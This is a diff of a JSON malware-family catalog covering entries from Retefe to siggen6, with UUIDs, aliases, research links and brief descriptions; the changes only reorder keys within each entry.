- "description": "Retefe is a Windows Banking Trojan that can also download and install additional malware onto the system using Windows PowerShell. It's primary functionality is to assist the attacker with stealing credentials for online banking websites. It is typically targeted against Swiss banks. The malware binary itself is primarily a dropper component for a Javascript file which builds a VBA file which in turn loads multiple tools onto the host including: 7zip and TOR. The VBA installs a new root certificate and then forwards all traffic via TOR to the attacker controlled host in order to effectively MITM TLS traffic."
+ "value": "Retefe"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [
- "Revetrat"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.revenge_rat",
  "http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/",
  "https://isc.sans.edu/diary/rss/22590",
  "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/"
- ]
+ ],
+ "synonyms": [
+ "Revetrat"
+ ],
+ "type": []
  },
  "uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f",
- "value": "Revenge RAT",
- "description": ""
+ "value": "Revenge RAT"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rgdoor",
  "https://researchcenter.paloaltonetworks.com/2017/09/unit42-striking-oil-closer-look-adversary-infrastructure/",
  "https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1",
- "value": "RGDoor",
- "description": ""
+ "value": "RGDoor"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rikamanu",
  "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "6703e8ce-2c5e-4a9d-96b4-49e90074b043",
- "value": "Rikamanu",
- "description": ""
+ "value": "Rikamanu"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "383021b9-fcf9-4c21-a0e2-d75fb8c0727a",
- "value": "Rincux",
- "description": ""
+ "value": "Rincux"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.ripper_atm",
  "http://blog.trendmicro.com/trendlabs-security-intelligence/untangling-ripper-atm-malware/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "a85b0619-ed8e-4324-8603-af211d682dac",
- "value": "Ripper ATM",
- "description": ""
+ "value": "Ripper ATM"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [
- "yellowalbatross"
- ],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rock",
  "https://github.com/securitykitten/malware_references/blob/master/rmshixdAPT-C-15-20160630.pdf"
- ]
+ ],
+ "synonyms": [
+ "yellowalbatross"
+ ],
+ "type": []
  },
  "uuid": "95a26977-295f-4843-ad11-a3d9dcb6c192",
- "value": "rock",
- "description": ""
+ "value": "rock"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rockloader",
  "https://www.proofpoint.com/us/threat-insight/post/Locky-Ransomware-Cybercriminals-Introduce-New-RockLoader-Malware"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "1482ffff-47a8-46da-8f47-d363c9d86c0e",
- "value": "Rockloader",
- "description": ""
+ "value": "Rockloader"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rofin"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf",
- "value": "Rofin",
- "description": ""
+ "value": "Rofin"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokku"
- ]
+ ],
+ "synonyms": [],
+ "type": []
  },
  "uuid": "38f57823-ccc2-424b-8140-8ba30325af9c",
- "value": "Rokku",
- "description": ""
+ "value": "Rokku"
  },
  {
+ "description": "",
  "meta": {
- "synonyms": [],
- "type": [],
  "refs": [
  "https://malpedia.caad.fkie.fraunhofer.de/details/win.rokrat",
  "http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
@@ -12227,85 +12229,81 @@ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", "https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/", "https://www.youtube.com/watch?v=uoBQE5s2ba4" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5", - "value": "RokRAT", - "description": "" + "value": "RokRAT" }, { + "description": "", "meta": { - "synonyms": [ - "CarbonGrabber" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rombertik", "http://blogs.cisco.com/security/talos/rombertik" - ] + ], + "synonyms": [ + "CarbonGrabber" + ], + "type": [] }, "uuid": "ab5066b4-d5ff-4f83-9a05-6e74c043a6e1", - "value": "Rombertik", - "description": "" + "value": "Rombertik" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.romeos" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "87a45a07-30d7-4223-ae61-6b1e6dde0f5a", - "value": "Romeo(Alfa,Bravo, ...)", - "description": "" + "value": "Romeo(Alfa,Bravo, ...)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roopirs" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b4a3d0ef-2d7b-4da5-8f90-8213f8f318d9", - "value": "Roopirs", - "description": "" + "value": "Roopirs" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.roseam", "http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", - "value": "Roseam", - "description": "" + "value": "Roseam" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rover", 
"http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "53e94bc9-c8d2-4fb6-9c02-00841e454050", - "value": "Rover", - "description": "" + "value": "Rover" }, { + "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least).", "meta": { - "synonyms": [ - "Mayachok", - "Cidox", - "BkLoader" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix", "https://securelist.com/cybercriminals-switch-from-mbr-to-ntfs-2/29117/", 
@@ -12317,136 +12315,140 @@ "http://www.malwaretech.com/2014/05/rovnix-new-evolution.html", "https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-RodionovMatrosov.pdf", "http://www.malwaredigger.com/2015/05/rovnix-dropper-analysis.html" - ] + ], + "synonyms": [ + "Mayachok", + "Cidox", + "BkLoader" + ], + "type": [] }, "uuid": "8d984309-b7fa-4ccf-a6b7-da17283aae2f", - "value": "Rovnix", - "description": "Rovnix is a bootkit and consists of a driver loader (in the VBR) and the drivers (32bit, 64bit) themselves. It is part of the Carberp source code leak (https://github.com/nyx0/Rovnix). Rovnix has been used to protect Gozi ISFB, ReactorBot and Rerdom (at least)." + "value": "Rovnix" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://github.com/nccgroup/Royal_APT" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "92d87656-5e5b-410c-bdb6-bf028324dc72", - "value": "RoyalCli", - "description": "" + "value": "RoyalCli" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.royal_dns", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", "https://github.com/nccgroup/Royal_APT" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8611f656-b0d8-4d16-93f0-c699f2af9b7a", - "value": "Royal DNS", - "description": "" + "value": "Royal DNS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rozena", "https://www.gdatasoftware.com/blog/2018/06/30862-fileless-malware-rozena" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cf74b7a5-72c0-4c2a-96c1-b3c49fc8f766", - "value": "Rozena", 
- "description": "" + "value": "Rozena" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm", "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e6952b4d-e96d-4641-a88f-60074776d553", - "value": "RTM", - "description": "" + "value": "RTM" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtpos", "https://boozallenmts.com/resources/news/rtpos-new-point-sale-malware-family-uncovered" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "89ee2cb0-2c72-4a25-825b-bb56083fdd9b", - "value": "rtpos", - "description": "" + "value": "rtpos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ruckguv", "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b88b50c0-3db9-4b8f-8564-4f56f991bee2", - "value": "Ruckguv", - "description": "" + "value": "Ruckguv" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e1564cfe-ab82-4c14-8f92-65af0d760d70", - "value": "Rumish", - "description": "" + "value": "Rumish" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.runningrat", "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b746a645-5974-44db-a811-a024214b7fba", - "value": "running_rat", - "description": "" + "value": "running_rat" }, { + "description": "", "meta": { - "synonyms": [ - "RCSU" - ], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.rurktar", "https://www.gdatasoftware.com/blog/2017/07/29896-rurktar-spyware-under-construction" - ] + ], + "synonyms": [ + "RCSU" + ], + "type": [] }, "uuid": "512e0b13-a52b-45ef-9230-7172f5e976d4", - "value": "Rurktar", - "description": "" + "value": "Rurktar" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rustock", "https://www.secureworks.com/blog/research-21041", 
@@ -12457,78 +12459,78 @@ "http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf", "http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf", "https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d", - "value": "Rustock", - "description": "" + "value": "Rustock" }, { + "description": "", "meta": { - "synonyms": [ - "Saga" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sage_ransom", "https://isc.sans.edu/forums/diary/Sage+20+Ransomware/21959/", "https://www.govcert.admin.ch/blog/27/saga-2.0-comes-with-ip-generation-algorithm-ipga", "https://blog.malwarebytes.com/threat-analysis/2017/03/explained-sage-ransomware/", "http://malware-traffic-analysis.net/2017/10/13/index.html" - ] + ], + "synonyms": [ + "Saga" + ], + "type": [] }, "uuid": "56db8a46-a71b-4de1-a6b8-4312f78b8431", - "value": "SAGE", - "description": "" + "value": "SAGE" }, { + "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised computer.", "meta": { - "synonyms": [ - "Sakurel" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2016/june/sakula-an-adventure-in-dll-planting/?page=1", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Sakula", "https://www.symantec.com/security_response/writeup.jsp?docid=2014-022401-3212-99", "https://www.secureworks.com/research/sakula-malware-family" - ] + ], + "synonyms": [ + "Sakurel" + ], + "type": [] }, "uuid": "e88eb9b1-dc8b-4696-8dcf-0c29924d0f8b", - "value": "Sakula RAT", - "description": "Sakula / Sakurel is a trojan horse that opens a back door and downloads potentially malicious files onto the compromised 
computer." + "value": "Sakula RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.salgorea", "https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "060ff141-bb68-47ca-8a9d-8722f1edaa6e", - "value": "Salgorea", - "description": "" + "value": "Salgorea" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cf752563-ad8a-4286-b2b3-9acf24a0a09a", - "value": "Sality", - "description": "" + "value": "Sality" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.samsam", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx", 
@@ -12536,207 +12538,202 @@ "http://blog.talosintel.com/2016/03/samsam-ransomware.html", "http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html", "https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a", - "value": "SamSam", - "description": "" + "value": "SamSam" }, { + "description": "", "meta": { - "synonyms": [ - "Daws" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sanny", "http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html" - ] + ], + "synonyms": [ + "Daws" + ], + "type": [] }, "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", - "value": "Sanny", - "description": "" + "value": "Sanny" }, { + "description": "", "meta": { - "synonyms": [ - "Hussarini" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sarhust", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/bkdr_sarhust.a", "https://www.fortinet.com/blog/threat-research/hussarini---targeted-cyber-attack-in-the-philippines.html" - ] + ], + "synonyms": [ + "Hussarini" + ], + "type": [] }, "uuid": "5aed5403-9c52-4de6-9c8d-d29e5197ef7e", - "value": "Sarhust", - "description": "" + "value": "Sarhust" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", - "value": "Satan Ransomware", - "description": "" + "value": "Satan Ransomware" }, { + "description": "", "meta": { - "synonyms": [], - 
"type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana", "https://www.cylance.com/threat-spotlight-satan-raas" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "09b555be-8bac-44b2-8741-922ee0b87880", - "value": "Satana", - "description": "" + "value": "Satana" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sathurbot", "https://www.welivesecurity.com/2017/04/06/sathurbot-distributed-wordpress-password-attack/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bdc7cc9c-c46d-4f77-b903-2335cc1a3369", - "value": "Sathurbot", - "description": "" + "value": "Sathurbot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e3adbb0d-6d6e-4686-8108-ee76452339bf", - "value": "ScanPOS", - "description": "" + "value": "ScanPOS" }, { + "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.schneiken", "https://engineering.salesforce.com/malware-analysis-new-trojan-double-dropper-5ed0a943adb", "https://github.com/vithakur/schneiken" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "92a65c89-acc3-4ee7-8db0-f0ea293ed12d", - "value": "Schneiken", - "description": "Schneiken is a VBS 'Double-dropper'. It comes with two RATs embedded in the code (Dunihi and Ratty). Entire code is Base64 encoded." 
+ "value": "Schneiken" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scote", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-the-tophat-campaign-attacks-within-the-middle-east-region-using-popular-third-party-services/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8c764bd6-2c6e-4cb2-93e3-f805cd99fe1e", - "value": "Scote", - "description": "" + "value": "Scote" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.screenlocker", "https://twitter.com/struppigel/status/791535679905927168" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9803b201-28e5-40c5-b661-c1a191388072", - "value": "ScreenLocker", - "description": "" + "value": "ScreenLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seadaddy", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1d07212e-6292-40a4-a5e9-30aef83b6207", - "value": "SeaDaddy", - "description": "" + "value": "SeaDaddy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d66f466a-e70e-4b62-9a04-d62eb41da15c", - "value": "SeaSalt", - "description": "" + "value": "SeaSalt" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedll", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", 
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "272268bb-2715-476b-a121-49142581c559", - "value": "SeDll", - "description": "" + "value": "SeDll" }, { + "description": "", "meta": { - "synonyms": [ - "azzy", - "eviltoss" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sedreco", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/", "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf" - ] + ], + "synonyms": [ + "azzy", + "eviltoss" + ], + "type": [] }, "uuid": "21ab9e14-602a-4a76-a308-dbf5d6a91d75", - "value": "Sedreco", - "description": "" + "value": "Sedreco" }, { + "description": "", "meta": { - "synonyms": [ - "jhuhugit", - "jkeyskw", - "downrage", - "carberplike" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", 
@@ -12750,183 +12747,186 @@ "https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed", "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/" - ] + ], + "synonyms": [ + "jhuhugit", + "jkeyskw", + "downrage", + "carberplike" + ], + "type": [] }, "uuid": "6bd20349-1231-4aaa-ba2a-f4b09d3b344c", - "value": "Seduploader", - "description": "" + "value": "Seduploader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sendsafe" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "503ca41c-7788-477c-869b-ac530f20c490", - "value": "SendSafe", - "description": "" + "value": "SendSafe" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.serpico" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", - "value": "Serpico", - "description": "" + "value": "Serpico" }, { + "description": "", "meta": { - "synonyms": [ - "XShellGhost" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowpad", "https://securelist.com/shadowpad-in-corporate-networks/81432/", "https://cdn.securelist.com/files/2017/08/ShadowPad_technical_description_PDF.pdf", "http://www.dailysecu.com/?mod=bbs&act=download&bbs_id=bbs_10&upload_idxno=4070" - ] + ], + "synonyms": [ + "XShellGhost" + ], + "type": [] }, "uuid": "e089e945-a523-4d11-a135-396f9b6c1dc7", - "value": "ShadowPad", - "description": "" + "value": "ShadowPad" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti", "https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-technical-analysis/amp/", 
"https://blog.malwarebytes.com/threat-analysis/2016/08/shakti-trojan-stealing-documents/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f64683c8-50ab-42c0-8b90-881598906528", - "value": "Shakti", - "description": "" + "value": "Shakti" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shapeshift", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "15dd8386-f11a-485a-b719-440c0a47dee6", - "value": "SHAPESHIFT", - "description": "" + "value": "SHAPESHIFT" }, { + "description": "", "meta": { - "synonyms": [ - "remotecmd" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip", "https://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong" - ] + ], + "synonyms": [ + "remotecmd" + ], + "type": [] }, "uuid": "6f9ed0b0-63c8-4f51-8425-17cfc2b3c12e", - "value": "shareip", - "description": "" + "value": "shareip" }, { + "description": "", "meta": { - "synonyms": [ - "Bitrep" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536.11.WHITE.pdf", "https://eromang.zataz.com/tag/agentbase-exe/" - ] + ], + "synonyms": [ + "Bitrep" + ], + "type": [] }, "uuid": "d31f1c73-d14b-41e2-bb16-81ee1d886e43", - "value": "SHARPKNOT", - "description": "" + "value": "SHARPKNOT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shelllocker", "https://twitter.com/JaromirHorejsi/status/813726714228604928" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "af35e295-7087-4f6c-9f70-a431bf223822", - "value": "ShellLocker", - "description": "" + "value": "ShellLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.shifu", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3", - "value": "Shifu", - "description": "" + "value": "Shifu" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shimrat", "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", - "value": "Shim RAT", - "description": "" + "value": "Shim RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shujin", "https://blog.trendmicro.com/trendlabs-security-intelligence/chinese-language-ransomware-makes-appearance/", "http://www.nyxbone.com/malware/chineseRansom.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "77c20bd9-5403-4f99-bae5-c54f3f38a6b6", - "value": "Shujin", - "description": "" + "value": "Shujin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shurl0ckr", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82", - "value": "Shurl0ckr", - "description": "" + "value": "Shurl0ckr" }, { + "description": "", "meta": { - "synonyms": [ - "Caphaw" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.shylock", "https://securityintelligence.com/merchant-of-fraud-returns-shylock-polymorphic-financial-malware-infections-on-the-rise/", 
@@ -12935,112 +12935,123 @@ "https://www.virusbulletin.com/virusbulletin/2015/02/paper-pluginer-caphaw", "http://contagiodump.blogspot.com/2011/09/sept-21-greedy-shylock-financial.html", "https://malwarereversing.wordpress.com/2011/09/27/debugging-injected-code-with-ida-pro/" - ] + ], + "synonyms": [ + "Caphaw" + ], + "type": [] }, "uuid": "515ee69a-298a-4fcf-bdb0-c5fc6d41872f", - "value": "Shylock", - "description": "" + "value": "Shylock" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidewinder", "https://medium.com/@Sebdraven/apt-sidewinder-tricks-powershell-anti-forensics-and-execution-side-loading-5bc1a7e7c84c", "https://s.tencent.com/research/report/479.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3c43bd4c-8c40-47b5-ae97-3dd0f0c0e8d8", - "value": "win.sidewinder", - "description": "" + "value": "win.sidewinder" }, { + "description": "", "meta": { - "synonyms": [ - "Destover" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sierras", "https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group", "https://securingtomorrow.mcafee.com/mcafee-labs/analyzing-operation-ghostsecret-attack-seeks-to-steal-data-worldwide/" - ] + ], + "synonyms": [ + "Destover" + ], + "type": [] }, "uuid": "da92c927-9b31-48aa-854a-8ed49a29565b", - "value": "Sierra(Alfa,Bravo, ...)", - "description": "" + "value": "Sierra(Alfa,Bravo, ...)" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.siggen6" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c12b3e30-32bf-4b7e-98f6-6a00e95553f8", 